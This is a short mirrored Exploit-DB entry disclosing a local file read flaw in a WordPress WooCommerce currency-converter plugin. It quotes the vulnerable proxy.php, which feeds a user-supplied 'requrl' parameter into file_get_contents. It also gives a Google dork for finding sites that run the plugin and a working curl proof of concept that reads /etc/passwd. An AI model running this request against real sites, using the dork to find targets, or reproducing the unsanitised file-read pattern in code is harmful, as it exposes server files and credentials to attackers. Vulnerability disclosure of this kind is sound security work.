WordPress Plugin Paypal Currency Converter Basic For WooCommerce – File Read

  • 作者: Kuroi'SH
    日期: 2015-06-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37253/
  • # Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
    # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
    # Date: 10/06/2015
    # Exploit Author: Kuroi'SH
    # Software Link:
    
    PayPal Currency Converter BASIC for WooCommerce
    # Version: <=1.3 # Tested on: Linux Description: proxy.php's code: <?php $file = file_get_contents($_GET['requrl']); $left=strpos($file,'<div id=currency_converter_result>'); $right=strlen($file)-strpos($file,'<input type=hidden name=meta'); $snip= substr($file,$left,$right); echo $snip; ?> Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to readany local file which is not executed in the server. Example: http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd POC: curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd